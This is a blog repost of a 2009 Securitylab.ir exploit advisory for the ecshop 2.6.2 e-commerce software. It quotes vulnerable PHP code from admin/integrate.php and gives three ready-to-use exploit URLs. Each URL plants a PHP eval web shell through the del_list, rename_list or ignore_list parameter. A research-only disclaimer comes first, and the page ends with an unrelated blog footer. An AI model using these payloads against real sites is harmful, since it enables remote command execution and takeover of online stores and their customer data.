ecshop 2.6.2 Multiple Remote Command Execution Vulnerabilities

2009年11月26日星期四 | | |

[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
 ######################### Securitylab.ir ########################  # Application Info:  # Name: ecshop  # Version: 2.6.2  # Website: http://www.ecshop.com  #################################################################  # Discoverd By: Securitylab.ir  # Website: http://securitylab.ir  # Contacts: info@securitylab[dot]ir & [email protected]  #################################################################  #===========================================================  # :: integrate.php ::  #  # if ($_REQUEST['act'] == 'sync')  # {  # $size = 100;  # ......  # $tasks = array();  # if ($task_del > 0)  # {  # $tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'<span id="task_del">' . $_LANG['task_uncomplete'] . '<span>');  # $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2";  # $del_list = $db->getCol($sql);//$del_list  # }  # if ($task_rename > 0)  # {  # $tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'<span id="task_rename">' . $_LANG['task_uncomplete'] . '</span>');  # $sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3";  # $rename_list = $db->getAll($sql);//$rename_list  # }  # if ($task_ignore >0)  # {  # $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4";  # $ignore_list = $db->getCol($sql);//$ignore_list  # }  # ....  # $fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb');  # $log = '';  # if (isset($del_list))  # {  # $log .= '$del_list=' . var_export($del_list,true) . ';';  # }  # if (isset($rename_list))  # {  # $log .= '$rename_list=' . var_export($rename_list, true) . ';';  # }  # if (isset($ignore_list))  # {  # $log .= '$ignore_list=' . var_export($ignore_list, true) . ';';  # }  # fwrite($fp, $log);  # fclose($fp);  # $smarty->assign('tasks', $tasks);  # $smarty->assign('ur_here',$_LANG['user_sync']);  # $smarty->assign('size', $size);  # $smarty->display('integrates_sync.htm');  # }  #  #  # http://site.com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>  # http://site.com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>  # http://site.com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>  #===========================================================  #################################################################  # Securitylab Security Research Team  ###################################################################
 
我的QQ空间
kmeleon.js及pref.js配置解释
K-MeleonCCF ME目录下的defaults\pref\kmeleon.js保存了K-Meleon...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]